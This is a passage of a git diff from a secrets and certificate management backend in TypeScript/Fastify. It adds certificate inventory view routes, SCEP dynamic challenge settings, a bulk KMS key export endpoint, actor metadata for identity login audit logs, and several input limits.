UpdateVenafiTppCertificateAuthoritySchema + }); +}; diff --git a/backend/src/server/routes/v1/certificate-inventory-view-router.ts b/backend/src/server/routes/v1/certificate-inventory-view-router.ts new file mode 100644 index 00000000000..80909783ffc --- /dev/null +++ b/backend/src/server/routes/v1/certificate-inventory-view-router.ts @@ -0,0 +1,260 @@ +import { z } from "zod"; + +import { CertificateInventoryViewsSchema } from "@app/db/schemas"; +import { EventType } from "@app/ee/services/audit-log/audit-log-types"; +import { ApiDocsTags } from "@app/lib/api-docs"; +import { readLimit, writeLimit } from "@app/server/config/rateLimiter"; +import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; +import { AuthMode } from "@app/services/auth/auth-type"; + +const InventoryViewFiltersSchema = z + .object({ + status: z.string().max(100).optional(), + notAfterTo: z.coerce.date().optional(), + notAfterFrom: z.coerce.date().optional(), + notBeforeTo: z.coerce.date().optional(), + notBeforeFrom: z.coerce.date().optional(), + enrollmentTypes: z.array(z.string().max(64)).max(10).optional(), + keyAlgorithm: z.union([z.string().max(64), z.array(z.string().max(64)).max(10)]).optional(), + keySizes: z.array(z.number().int().positive()).max(10).optional(), + caIds: z.array(z.string().uuid()).max(50).optional(), + profileIds: z.array(z.string().uuid()).max(50).optional(), + source: z.union([z.string().max(64), z.array(z.string().max(64)).max(10)]).optional() + }) + .strict(); + +const ValidColumns = [ + "sanCn", + "serialNumber", + "enrollmentMethod", + "status", + "health", + "issuedAt", + "expiresAt", + "ca", + "profile", + "algorithm", + "source" +] as const; + +const ColumnsSchema = z.array(z.enum(ValidColumns)).max(20); + +export const registerCertificateInventoryViewRouter = async (server: FastifyZodProvider) => { + server.route({ + method: "GET", + url: "/:projectId/certificate-inventory-views", + config: { + rateLimit: readLimit + }, + schema: { + hide: true, + operationId: "listCertificateInventoryViews", + tags: [ApiDocsTags.PkiCertificates], + description: "List system and custom certificate inventory views for a project.", + params: z.object({ + projectId: z.string().trim() + }), + response: { + 200: z.object({ + systemViews: z.array( + z.object({ + id: z.string(), + name: z.string(), + filters: z.object({ + status: z.array(z.string()).optional(), + notAfterTo: z.string().optional() + }), + columns: z.null(), + isSystem: z.literal(true), + createdByUserId: z.null() + }) + ), + sharedViews: z.array( + CertificateInventoryViewsSchema.extend({ + isSystem: z.literal(false), + isShared: z.literal(true) + }) + ), + customViews: z.array( + CertificateInventoryViewsSchema.extend({ + isSystem: z.literal(false), + isShared: z.literal(false) + }) + ) + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + return server.services.certificateInventoryView.listViews({ + projectId: req.params.projectId, + actorId: req.permission.id, + actorOrgId: req.permission.orgId, + actorAuthMethod: req.permission.authMethod, + actor: req.permission.type + }); + } + }); + + server.route({ + method: "POST", + url: "/:projectId/certificate-inventory-views", + config: { + rateLimit: writeLimit + }, + schema: { + hide: true, + operationId: "createCertificateInventoryView", + tags: [ApiDocsTags.PkiCertificates], + description: "Create a custom certificate inventory view.", + params: z.object({ + projectId: z.string().trim() + }), + body: z.object({ + name: z.string().trim().min(1).max(255), + filters: InventoryViewFiltersSchema.default({}), + columns: ColumnsSchema.optional(), + isShared: z.boolean().default(false).optional() + }), + response: { + 200: z.object({ + view: CertificateInventoryViewsSchema + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + const view = await server.services.certificateInventoryView.createView({ + projectId: req.params.projectId, + name: req.body.name, + filters: req.body.filters, + columns: req.body.columns, + isShared: req.body.isShared, + actorId: req.permission.id, + actorOrgId: req.permission.orgId, + actorAuthMethod: req.permission.authMethod, + actor: req.permission.type + }); + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + projectId: req.params.projectId, + event: { + type: EventType.CREATE_CERTIFICATE_INVENTORY_VIEW, + metadata: { + viewId: view.id, + name: view.name, + filters: req.body.filters, + columns: req.body.columns, + isShared: req.body.isShared + } + } + }); + return { view }; + } + }); + + server.route({ + method: "PATCH", + url: "/:projectId/certificate-inventory-views/:viewId", + config: { + rateLimit: writeLimit + }, + schema: { + hide: true, + operationId: "updateCertificateInventoryView", + tags: [ApiDocsTags.PkiCertificates], + description: "Update a custom certificate inventory view.", + params: z.object({ + projectId: z.string().trim(), + viewId: z.string().uuid() + }), + body: z.object({ + name: z.string().trim().min(1).max(255).optional(), + filters: InventoryViewFiltersSchema.optional(), + columns: ColumnsSchema.optional(), + isShared: z.boolean().optional() + }), + response: { + 200: z.object({ + view: CertificateInventoryViewsSchema + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + const view = await server.services.certificateInventoryView.updateView({ + viewId: req.params.viewId, + projectId: req.params.projectId, + name: req.body.name, + filters: req.body.filters, + columns: req.body.columns, + isShared: req.body.isShared, + actorId: req.permission.id, + actorOrgId: req.permission.orgId, + actorAuthMethod: req.permission.authMethod, + actor: req.permission.type + }); + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + projectId: req.params.projectId, + event: { + type: EventType.UPDATE_CERTIFICATE_INVENTORY_VIEW, + metadata: { + viewId: view.id, + name: view.name, + filters: req.body.filters, + columns: req.body.columns, + isShared: req.body.isShared + } + } + }); + return { view }; + } + }); + + server.route({ + method: "DELETE", + url: "/:projectId/certificate-inventory-views/:viewId", + config: { + rateLimit: writeLimit + }, + schema: { + hide: true, + operationId: "deleteCertificateInventoryView", + tags: [ApiDocsTags.PkiCertificates], + description: "Delete a custom certificate inventory view.", + params: z.object({ + projectId: z.string().trim(), + viewId: z.string().uuid() + }), + response: { + 200: z.object({ + view: CertificateInventoryViewsSchema + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + const view = await server.services.certificateInventoryView.deleteView({ + viewId: req.params.viewId, + projectId: req.params.projectId, + actorId: req.permission.id, + actorOrgId: req.permission.orgId, + actorAuthMethod: req.permission.authMethod, + actor: req.permission.type + }); + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + projectId: req.params.projectId, + event: { + type: EventType.DELETE_CERTIFICATE_INVENTORY_VIEW, + metadata: { + viewId: req.params.viewId, + name: view.name + } + } + }); + return { view }; + } + }); +}; diff --git a/backend/src/server/routes/v1/certificate-profiles-router.ts b/backend/src/server/routes/v1/certificate-profiles-router.ts index 37a53e8c75d..2e3f354ebf2 100644 --- a/backend/src/server/routes/v1/certificate-profiles-router.ts +++ b/backend/src/server/routes/v1/certificate-profiles-router.ts @@ -3,6 +3,7 @@ import { z } from "zod"; import { PkiCertificateProfilesSchema } from "@app/db/schemas"; import { EventType } from "@app/ee/services/audit-log/audit-log-types"; +import { ScepChallengeType } from "@app/ee/services/pki-scep/challenge"; import { ApiDocsTags } from "@app/lib/api-docs"; import { readLimit, writeLimit } from "@app/server/config/rateLimiter"; import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; @@ -87,9 +88,12 @@ export const registerCertificateProfilesRouter = async ( .optional(), scepConfig: z .object({ - challengePassword: z.string().min(8), + challengeType: z.nativeEnum(ScepChallengeType).default(ScepChallengeType.STATIC), + challengePassword: z.string().optional(), includeCaCertInResponse: z.boolean().optional(), - allowCertBasedRenewal: z.boolean().optional() + allowCertBasedRenewal: z.boolean().optional(), + dynamicChallengeExpiryMinutes: z.number().int().min(1).max(1440).default(60), + dynamicChallengeMaxPending: z.number().int().min(1).max(1000).default(100) }) .optional(), externalConfigs: ExternalConfigUnionSchema, @@ -195,12 +199,15 @@ export const registerCertificateProfilesRouter = async ( .refine( (data) => { if (data.enrollmentType === EnrollmentType.SCEP) { - return !!data.scepConfig?.challengePassword; + if (!data.scepConfig) return false; + // Static mode requires a challenge password with min 8 chars; dynamic mode does not + if (data.scepConfig.challengeType === ScepChallengeType.DYNAMIC) return true; + return !!data.scepConfig.challengePassword && data.scepConfig.challengePassword.length >= 8; } return true; }, { - message: "SCEP enrollment type requires SCEP configuration with a challenge password" + message: "SCEP static challenge requires a challenge password with at least 8 characters" } ) .refine( @@ -357,7 +364,11 @@ export const registerCertificateProfilesRouter = async ( raCertificatePem: z.string(), raCertExpiresAt: z.date(), includeCaCertInResponse: z.boolean(), - allowCertBasedRenewal: z.boolean() + allowCertBasedRenewal: z.boolean(), + challengeType: z.string(), + challengeEndpointUrl: z.string().optional(), + dynamicChallengeExpiryMinutes: z.number().optional(), + dynamicChallengeMaxPending: z.number().optional() }) .optional(), externalConfigs: ExternalConfigUnionSchema, @@ -459,7 +470,11 @@ export const registerCertificateProfilesRouter = async ( raCertificatePem: z.string(), raCertExpiresAt: z.date(), includeCaCertInResponse: z.boolean(), - allowCertBasedRenewal: z.boolean() + allowCertBasedRenewal: z.boolean(), + challengeType: z.string(), + challengeEndpointUrl: z.string().optional(), + dynamicChallengeExpiryMinutes: z.number().optional(), + dynamicChallengeMaxPending: z.number().optional() }) .optional(), externalConfigs: ExternalConfigUnionSchema @@ -578,9 +593,12 @@ export const registerCertificateProfilesRouter = async ( .optional(), scepConfig: z .object({ - challengePassword: z.string().min(8).optional(), + challengeType: z.nativeEnum(ScepChallengeType).optional(), + challengePassword: z.string().optional(), includeCaCertInResponse: z.boolean().optional(), - allowCertBasedRenewal: z.boolean().optional() + allowCertBasedRenewal: z.boolean().optional(), + dynamicChallengeExpiryMinutes: z.number().int().min(1).max(1440).optional(), + dynamicChallengeMaxPending: z.number().int().min(1).max(1000).optional() }) .optional(), externalConfigs: ExternalConfigUnionSchema, @@ -634,6 +652,18 @@ export const registerCertificateProfilesRouter = async ( { message: "Cannot skip both External Account Binding (EAB) and DNS ownership verification at the same time." } + ) + .refine( + (data) => { + if (data.scepConfig?.challengePassword) { + if (data.scepConfig.challengeType === ScepChallengeType.DYNAMIC) return true; + return data.scepConfig.challengePassword.length >= 8; + } + return true; + }, + { + message: "SCEP static challenge requires a challenge password with at least 8 characters" + } ), response: { 200: z.object({ diff --git a/backend/src/server/routes/v1/certificate-router.ts b/backend/src/server/routes/v1/certificate-router.ts index c8302db3e16..2bacc31be08 100644 --- a/backend/src/server/routes/v1/certificate-router.ts +++ b/backend/src/server/routes/v1/certificate-router.ts @@ -436,6 +436,63 @@ export const registerCertificateRouter = async (server: FastifyZodProvider) => { } }); + server.route({ + method: "POST", + url: "/certificate-requests/:requestId/trigger-validation", + config: { + rateLimit: writeLimit + }, + schema: { + hide: false, + operationId: "triggerCertificateRequestValidation", + tags: [ApiDocsTags.PkiCertificates], + description: "Manually ask the issuing CA to re-check validation for a pending certificate request", + params: z.object({ + requestId: z.string().uuid() + }), + response: { + 200: z.object({ + status: z.nativeEnum(CertificateRequestStatus), + orderStatus: z.string().optional() + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + const result = await server.services.certificateAuthority.triggerCertificateRequestValidation({ + actor: req.permission.type, + actorId: req.permission.id, + actorAuthMethod: req.permission.authMethod, + actorOrgId: req.permission.orgId, + certificateRequestId: req.params.requestId + }); + + const orderStatus = "orderStatus" in result ? result.orderStatus : undefined; + const mappedStatus = + result.status === "skipped" + ? CertificateRequestStatus.PENDING_VALIDATION + : (result.status as CertificateRequestStatus); + + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + projectId: result.projectId, + event: { + type: EventType.TRIGGER_CERTIFICATE_REQUEST_VALIDATION, + metadata: { + certificateRequestId: req.params.requestId, + status: mappedStatus, + orderStatus + } + } + }); + + return { + status: mappedStatus, + orderStatus + }; + } + }); + server.route({ method: "GET", url: "/certificate-requests", diff --git a/backend/src/server/routes/v1/cmek-router.ts b/backend/src/server/routes/v1/cmek-router.ts index bb45738625b..0a6ded8679e 100644 --- a/backend/src/server/routes/v1/cmek-router.ts +++ b/backend/src/server/routes/v1/cmek-router.ts @@ -518,6 +518,60 @@ export const registerCmekRouter = async (server: FastifyZodProvider) => { } }); + server.route({ + method: "POST", + url: "/keys/bulk-export-private-keys", + config: { + rateLimit: readLimit + }, + schema: { + hide: false, + operationId: "bulkExportKmsKeyPrivateKeys", + tags: [ApiDocsTags.KmsKeys], + description: + "Bulk export multiple KMS keys. For asymmetric keys (sign/verify), both private and public keys are returned. For symmetric keys (encrypt/decrypt), the key material is returned.", + body: z.object({ + keyIds: z.array(z.string().uuid().describe(KMS.BULK_EXPORT_PRIVATE_KEYS.keyIds)).min(1).max(100) + }), + response: { + 200: z.object({ + keys: z.array( + z.object({ + keyId: z.string(), + name: z.string(), + keyUsage: z.string(), + algorithm: z.string(), + privateKey: z.string(), + publicKey: z.string().optional() + }) + ) + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + const { + body: { keyIds }, + permission + } = req; + + const { keys, projectId } = await server.services.cmek.bulkGetPrivateKeys({ keyIds }, permission); + + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + projectId, + event: { + type: EventType.CMEK_BULK_EXPORT_PRIVATE_KEYS, + metadata: { + keys: keys.map((k) => ({ keyId: k.keyId, name: k.name })) + } + } + }); + + return { keys }; + } + }); + server.route({ method: "GET", url: "/keys/:keyId/signing-algorithms", diff --git a/backend/src/server/routes/v1/dashboard-router.ts b/backend/src/server/routes/v1/dashboard-router.ts index 083daa20a9d..fd64ad84824 100644 --- a/backend/src/server/routes/v1/dashboard-router.ts +++ b/backend/src/server/routes/v1/dashboard-router.ts @@ -1686,7 +1686,7 @@ export const registerDashboardRouter = async (server: FastifyZodProvider) => { }), querystring: z.object({ offset: z.coerce.number(), - limit: z.coerce.number() + limit: z.coerce.number().max(1000) }), response: { 200: z.object({ diff --git a/backend/src/server/routes/v1/identity-alicloud-auth-router.ts b/backend/src/server/routes/v1/identity-alicloud-auth-router.ts index feaf8d6bb67..cdfa5560239 100644 --- a/backend/src/server/routes/v1/identity-alicloud-auth-router.ts +++ b/backend/src/server/routes/v1/identity-alicloud-auth-router.ts @@ -86,6 +86,13 @@ export const registerIdentityAliCloudAuthRouter = async (server: FastifyZodProvi await server.services.auditLog.createAuditLog({ ...req.auditLogInfo, + actor: { + type: ActorType.IDENTITY, + metadata: { + identityId: identityAliCloudAuth.identityId, + name: identity.name + } + }, orgId: identity.orgId, event: { type: EventType.LOGIN_IDENTITY_ALICLOUD_AUTH, diff --git a/backend/src/server/routes/v1/identity-aws-iam-auth-router.ts b/backend/src/server/routes/v1/identity-aws-iam-auth-router.ts index bdd794226ee..1738f53795f 100644 --- a/backend/src/server/routes/v1/identity-aws-iam-auth-router.ts +++ b/backend/src/server/routes/v1/identity-aws-iam-auth-router.ts @@ -53,6 +53,13 @@ export const registerIdentityAwsAuthRouter = async (server: FastifyZodProvider) await server.services.auditLog.createAuditLog({ ...req.auditLogInfo, + actor: { + type: ActorType.IDENTITY, + metadata: { + identityId: identityAwsAuth.identityId, + name: identity.name + } + }, orgId: identity.orgId, event: { type: EventType.LOGIN_IDENTITY_AWS_AUTH, diff --git a/backend/src/server/routes/v1/identity-azure-auth-router.ts b/backend/src/server/routes/v1/identity-azure-auth-router.ts index f8b7ee0c179..c8e1790e65c 100644 --- a/backend/src/server/routes/v1/identity-azure-auth-router.ts +++ b/backend/src/server/routes/v1/identity-azure-auth-router.ts @@ -48,6 +48,13 @@ export const registerIdentityAzureAuthRouter = async (server: FastifyZodProvider await server.services.auditLog.createAuditLog({ ...req.auditLogInfo, + actor: { + type: ActorType.IDENTITY, + metadata: { + identityId: identityAzureAuth.identityId, + name: identity.name + } + }, orgId: identity.orgId, event: { type: EventType.LOGIN_IDENTITY_AZURE_AUTH, diff --git a/backend/src/server/routes/v1/identity-gcp-auth-router.ts b/backend/src/server/routes/v1/identity-gcp-auth-router.ts index ddd117ea9a4..08b8a9a5010 100644 --- a/backend/src/server/routes/v1/identity-gcp-auth-router.ts +++ b/backend/src/server/routes/v1/identity-gcp-auth-router.ts @@ -48,6 +48,13 @@ export const registerIdentityGcpAuthRouter = async (server: FastifyZodProvider) await server.services.auditLog.createAuditLog({ ...req.auditLogInfo, + actor: { + type: ActorType.IDENTITY, + metadata: { + identityId: identityGcpAuth.identityId, + name: identity.name + } + }, orgId: identity.orgId, event: { type: EventType.LOGIN_IDENTITY_GCP_AUTH, diff --git a/backend/src/server/routes/v1/identity-jwt-auth-router.ts b/backend/src/server/routes/v1/identity-jwt-auth-router.ts index ffe14269c99..b415f15b195 100644 --- a/backend/src/server/routes/v1/identity-jwt-auth-router.ts +++ b/backend/src/server/routes/v1/identity-jwt-auth-router.ts @@ -124,6 +124,13 @@ export const registerIdentityJwtAuthRouter = async (server: FastifyZodProvider) await server.services.auditLog.createAuditLog({ ...req.auditLogInfo, + actor: { + type: ActorType.IDENTITY, + metadata: { + identityId: identityJwtAuth.identityId, + name: identity.name + } + }, orgId: identity.orgId, event: { type: EventType.LOGIN_IDENTITY_JWT_AUTH, diff --git a/backend/src/server/routes/v1/identity-kubernetes-auth-router.ts b/backend/src/server/routes/v1/identity-kubernetes-auth-router.ts index 46aa20732ce..8e728b7395d 100644 --- a/backend/src/server/routes/v1/identity-kubernetes-auth-router.ts +++ b/backend/src/server/routes/v1/identity-kubernetes-auth-router.ts @@ -30,7 +30,8 @@ const IdentityKubernetesAuthResponseSchema = IdentityKubernetesAuthsSchema.pick( allowedNamespaces: true, allowedNames: true, allowedAudience: true, - gatewayId: true + gatewayId: true, + gatewayPoolId: true }).extend({ caCert: z.string(), tokenReviewerJwt: z.string().optional().nullable() @@ -69,6 +70,13 @@ export const registerIdentityKubernetesRouter = async (server: FastifyZodProvide await server.services.auditLog.createAuditLog({ ...req.auditLogInfo, + actor: { + type: ActorType.IDENTITY, + metadata: { + identityId: identityKubernetesAuth.identityId, + name: identity.name + } + }, orgId: identity.orgId, event: { type: EventType.LOGIN_IDENTITY_KUBERNETES_AUTH, @@ -189,6 +197,7 @@ export const registerIdentityKubernetesRouter = async (server: FastifyZodProvide allowedNames: z.string().describe(KUBERNETES_AUTH.ATTACH.allowedNames), allowedAudience: z.string().describe(KUBERNETES_AUTH.ATTACH.allowedAudience), gatewayId: z.string().uuid().optional().nullable().describe(KUBERNETES_AUTH.ATTACH.gatewayId), + gatewayPoolId: z.string().uuid().optional().nullable(), accessTokenTrustedIps: z .object({ ipAddress: z.string().trim() @@ -226,11 +235,22 @@ export const registerIdentityKubernetesRouter = async (server: FastifyZodProvide message: "When token review mode is set to API, a Kubernetes host must be provided" }); } - if (data.tokenReviewMode === IdentityKubernetesAuthTokenReviewMode.Gateway && !data.gatewayId) { + if ( + data.tokenReviewMode === IdentityKubernetesAuthTokenReviewMode.Gateway && + !data.gatewayId && + !data.gatewayPoolId + ) { ctx.addIssue({ path: ["gatewayId"], code: z.ZodIssueCode.custom, - message: "When token review mode is set to Gateway, a gateway must be selected" + message: "When token review mode is set to Gateway, a gateway or gateway pool must be selected" + }); + } + if (data.gatewayId && data.gatewayPoolId) { + ctx.addIssue({ + path: ["gatewayPoolId"], + code: z.ZodIssueCode.custom, + message: "Cannot specify both a gateway and a gateway pool" }); } @@ -353,6 +373,7 @@ export const registerIdentityKubernetesRouter = async (server: FastifyZodProvide allowedNames: z.string().optional().describe(KUBERNETES_AUTH.UPDATE.allowedNames), allowedAudience: z.string().optional().describe(KUBERNETES_AUTH.UPDATE.allowedAudience), gatewayId: z.string().uuid().optional().nullable().describe(KUBERNETES_AUTH.UPDATE.gatewayId), + gatewayPoolId: z.string().uuid().optional().nullable(), accessTokenTrustedIps: z .object({ ipAddress: z.string().trim() @@ -386,12 +407,20 @@ export const registerIdentityKubernetesRouter = async (server: FastifyZodProvide if ( data.tokenReviewMode && data.tokenReviewMode === IdentityKubernetesAuthTokenReviewMode.Gateway && - !data.gatewayId + !data.gatewayId && + !data.gatewayPoolId ) { ctx.addIssue({ path: ["gatewayId"], code: z.ZodIssueCode.custom, - message: "When token review mode is set to Gateway, a gateway must be selected" + message: "When token review mode is set to Gateway, a gateway or gateway pool must be selected" + }); + } + if (data.gatewayId && data.gatewayPoolId) { + ctx.addIssue({ + path: ["gatewayPoolId"], + code: z.ZodIssueCode.custom, + message: "Cannot specify both a gateway and a gateway pool" }); } if (data.accessTokenMaxTTL && data.accessTokenTTL ? data.accessTokenTTL > data.accessTokenMaxTTL : false) { diff --git a/backend/src/server/routes/v1/identity-ldap-auth-router.ts b/backend/src/server/routes/v1/identity-ldap-auth-router.ts index 8c67c0cf895..82d3ba4a6a6 100644 --- a/backend/src/server/routes/v1/identity-ldap-auth-router.ts +++ b/backend/src/server/routes/v1/identity-ldap-auth-router.ts @@ -195,6 +195,13 @@ export const registerIdentityLdapAuthRouter = async (server: FastifyZodProvider) await server.services.auditLog.createAuditLog({ ...req.auditLogInfo, + actor: { + type: ActorType.IDENTITY, + metadata: { + identityId: authIdentityId, + name: identity.name + } + }, orgId: identity.orgId, event: { type: EventType.LOGIN_IDENTITY_LDAP_AUTH, diff --git a/backend/src/server/routes/v1/identity-oci-auth-router.ts b/backend/src/server/routes/v1/identity-oci-auth-router.ts index 51af55c00bf..05a41994c3b 100644 --- a/backend/src/server/routes/v1/identity-oci-auth-router.ts +++ b/backend/src/server/routes/v1/identity-oci-auth-router.ts @@ -65,6 +65,13 @@ export const registerIdentityOciAuthRouter = async (server: FastifyZodProvider) await server.services.auditLog.createAuditLog({ ...req.auditLogInfo, + actor: { + type: ActorType.IDENTITY, + metadata: { + identityId: identityOciAuth.identityId, + name: identity.name + } + }, orgId: identity.orgId, event: { type: EventType.LOGIN_IDENTITY_OCI_AUTH, diff --git a/backend/src/server/routes/v1/identity-oidc-auth-router.ts b/backend/src/server/routes/v1/identity-oidc-auth-router.ts index 37c4b26704b..43e7c5f738f 100644 --- a/backend/src/server/routes/v1/identity-oidc-auth-router.ts +++ b/backend/src/server/routes/v1/identity-oidc-auth-router.ts @@ -72,6 +72,13 @@ export const registerIdentityOidcAuthRouter = async (server: FastifyZodProvider) await server.services.auditLog.createAuditLog({ ...req.auditLogInfo, + actor: { + type: ActorType.IDENTITY, + metadata: { + identityId: identityOidcAuth.identityId, + name: identity.name + } + }, orgId: identity.orgId, event: { type: EventType.LOGIN_IDENTITY_OIDC_AUTH, diff --git a/backend/src/server/routes/v1/identity-spiffe-auth-router.ts b/backend/src/server/routes/v1/identity-spiffe-auth-router.ts index 132005a1f91..c540bf51d2e 100644 --- a/backend/src/server/routes/v1/identity-spiffe-auth-router.ts +++ b/backend/src/server/routes/v1/identity-spiffe-auth-router.ts @@ -136,6 +136,13 @@ export const registerIdentitySpiffeAuthRouter = async (server: FastifyZodProvide await server.services.auditLog.createAuditLog({ ...req.auditLogInfo, + actor: { + type: ActorType.IDENTITY, + metadata: { + identityId: identitySpiffeAuth.identityId, + name: identity.name + } + }, orgId: identity.orgId, event: { type: EventType.LOGIN_IDENTITY_SPIFFE_AUTH, diff --git a/backend/src/server/routes/v1/identity-tls-cert-auth-router.ts b/backend/src/server/routes/v1/identity-tls-cert-auth-router.ts index b7eafb6bcc6..572951b4e60 100644 --- a/backend/src/server/routes/v1/identity-tls-cert-auth-router.ts +++ b/backend/src/server/routes/v1/identity-tls-cert-auth-router.ts @@ -79,6 +79,13 @@ export const registerIdentityTlsCertAuthRouter = async (server: FastifyZodProvid await server.services.auditLog.createAuditLog({ ...req.auditLogInfo, + actor: { + type: ActorType.IDENTITY, + metadata: { + identityId: identityTlsCertAuth.identityId, + name: identity.name + } + }, orgId: identity.orgId, event: { type: EventType.LOGIN_IDENTITY_TLS_CERT_AUTH, diff --git a/backend/src/server/routes/v1/identity-universal-auth-router.ts b/backend/src/server/routes/v1/identity-universal-auth-router.ts index fe0d62e12fd..cbbb70af6c8 100644 --- a/backend/src/server/routes/v1/identity-universal-auth-router.ts +++ b/backend/src/server/routes/v1/identity-universal-auth-router.ts @@ -72,6 +72,13 @@ export const registerIdentityUaRouter = async (server: FastifyZodProvider) => { await server.services.auditLog.createAuditLog({ ...req.auditLogInfo, + actor: { + type: ActorType.IDENTITY, + metadata: { + identityId: identityUa.identityId, + name: identity.name + } + }, orgId: identity.orgId, event: { type: EventType.LOGIN_IDENTITY_UNIVERSAL_AUTH, diff --git a/backend/src/server/routes/v1/index.ts b/backend/src/server/routes/v1/index.ts index c00256cc400..1eafb60492c 100644 --- a/backend/src/server/routes/v1/index.ts +++ b/backend/src/server/routes/v1/index.ts @@ -15,6 +15,7 @@ import { registerCaRouter } from "./certificate-authority-router"; import { CERTIFICATE_AUTHORITY_REGISTER_ROUTER_MAP } from "./certificate-authority-routers"; import { registerGeneralCertificateAuthorityRouter } from "./certificate-authority-routers/general-certificate-authority-router"; import { registerCertificateCleanupRouter } from "./certificate-cleanup-router"; +import { registerCertificateInventoryViewRouter } from "./certificate-inventory-view-router"; import { registerCertificatePolicyRouter } from "./certificate-policy-router"; import { registerCertificateProfilesRouter } from "./certificate-profiles-router"; import { registerCertificateRouter } from "./certificate-router"; @@ -78,7 +79,6 @@ import { registerSecretValidationRuleRouter } from "./secret-validation-rule-rou import { registerSignerRouter } from "./signer-router"; import { registerSlackRouter } from "./slack-router"; import { registerSsoRouter } from "./sso-router"; -import { registerUpgradePathRouter } from "./upgrade-path-router"; import { registerUserActionRouter } from "./user-action-router"; import { registerUserEngagementRouter } from "./user-engagement-router"; import { registerUserRouter } from "./user-router"; @@ -152,6 +152,7 @@ export const registerV1Routes = async (server: FastifyZodProvider) => { await server.register( async (projectRouter) => { await projectRouter.register(registerProjectRouter); + await projectRouter.register(registerCertificateInventoryViewRouter); await projectRouter.register(registerProjectMembershipRouter); await projectRouter.register(registerProjectIdentityRouter); await projectRouter.register(registerProjectEnvRouter); @@ -314,8 +315,6 @@ export const registerV1Routes = async (server: FastifyZodProvider) => { ); await server.register(registerEventRouter, { prefix: "/events" }); - await server.register(registerUpgradePathRouter, { prefix: "/upgrade-path" }); - await server.register( async (approvalPolicyRouter) => { // Register policy type-specific endpoints diff --git a/backend/src/server/routes/v1/integration-router.ts b/backend/src/server/routes/v1/integration-router.ts index 8654c215a5e..f7954b7a19c 100644 --- a/backend/src/server/routes/v1/integration-router.ts +++ b/backend/src/server/routes/v1/integration-router.ts @@ -53,7 +53,7 @@ export const registerIntegrationRouter = async (server: FastifyZodProvider) => { targetService: z.string().trim().optional().describe(INTEGRATION.CREATE.targetService), targetServiceId: z.string().trim().optional().describe(INTEGRATION.CREATE.targetServiceId), owner: z.string().trim().optional().describe(INTEGRATION.CREATE.owner), - url: z.string().trim().optional().describe(INTEGRATION.CREATE.url), + url: z.string().trim().url().optional().describe(INTEGRATION.CREATE.url), path: z.string().trim().optional().describe(INTEGRATION.CREATE.path), region: z.string().trim().optional().describe(INTEGRATION.CREATE.region), scope: z.string().trim().optional().describe(INTEGRATION.CREATE.scope), diff --git a/backend/src/server/routes/v1/invite-org-router.ts b/backend/src/server/routes/v1/invite-org-router.ts index 55cd5f892da..416775fab28 100644 --- a/backend/src/server/routes/v1/invite-org-router.ts +++ b/backend/src/server/routes/v1/invite-org-router.ts @@ -22,6 +22,7 @@ export const registerInviteOrgRouter = async (server: FastifyZodProvider) => { .trim() .email() .array() + .max(100) .refine((val) => val.every((el) => el === el.toLowerCase()), "Email must be lowercase"), organizationId: z.string().trim(), organizationRoleSlug: z.string().default(OrgMembershipRole.Member) diff --git a/backend/src/server/routes/v1/microsoft-teams-router.ts b/backend/src/server/routes/v1/microsoft-teams-router.ts index d0905c23bc8..9928ae82ce8 100644 --- a/backend/src/server/routes/v1/microsoft-teams-router.ts +++ b/backend/src/server/routes/v1/microsoft-teams-router.ts @@ -376,6 +376,9 @@ export const registerMicrosoftTeamsRouter = async (server: FastifyZodProvider) = server.route({ method: "POST", url: "/message-endpoint", + config: { + rateLimit: writeLimit + }, schema: { operationId: "handleMicrosoftTeamsMessageEndpoint", body: z.any(), diff --git a/backend/src/server/routes/v1/organization-memberships-router.ts b/backend/src/server/routes/v1/organization-memberships-router.ts index 34e45196308..e64831ec0d7 100644 --- a/backend/src/server/routes/v1/organization-memberships-router.ts +++ b/backend/src/server/routes/v1/organization-memberships-router.ts @@ -3,9 +3,11 @@ import { z } from "zod"; import { AccessScope, GroupsSchema, TemporaryPermissionMode } from "@app/db/schemas"; import { ApiDocsTags } from "@app/lib/api-docs"; import { ms } from "@app/lib/ms"; +import { OrderByDirection } from "@app/lib/types"; import { readLimit, writeLimit } from "@app/server/config/rateLimiter"; import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; import { AuthMode } from "@app/services/auth/auth-type"; +import { OrgGroupsOrderBy } from "@app/services/membership-group/membership-group-types"; /** * Organization group memberships. @@ -54,7 +56,14 @@ export const registerOrganizationMembershipsRouter = async (server: FastifyZodPr security: [{ bearerAuth: [] }], querystring: z.object({ limit: z.coerce.number().min(1).max(100).default(100).optional(), - offset: z.coerce.number().min(0).default(0).optional() + offset: z.coerce.number().min(0).default(0).optional(), + search: z.string().optional(), + roles: z + .union([z.string(), z.array(z.string())]) + .transform((v) => (typeof v === "string" ? [v] : v)) + .optional(), + orderBy: z.nativeEnum(OrgGroupsOrderBy).optional(), + orderDirection: z.nativeEnum(OrderByDirection).optional() }), response: { 200: z.object({ @@ -72,7 +81,11 @@ export const registerOrganizationMembershipsRouter = async (server: FastifyZodPr }, data: { limit: req.query.limit, - offset: req.query.offset + offset: req.query.offset, + search: req.query.search, + roles: req.query.roles, + orderBy: req.query.orderBy, + orderDirection: req.query.orderDirection } }); diff --git a/backend/src/server/routes/v1/project-router.ts b/backend/src/server/routes/v1/project-router.ts index 9bb2fb12979..26f505579d9 100644 --- a/backend/src/server/routes/v1/project-router.ts +++ b/backend/src/server/routes/v1/project-router.ts @@ -1306,18 +1306,46 @@ export const registerProjectRouter = async (server: FastifyZodProvider) => { ) .optional() .describe(PROJECTS.SEARCH_CERTIFICATES.metadata), - 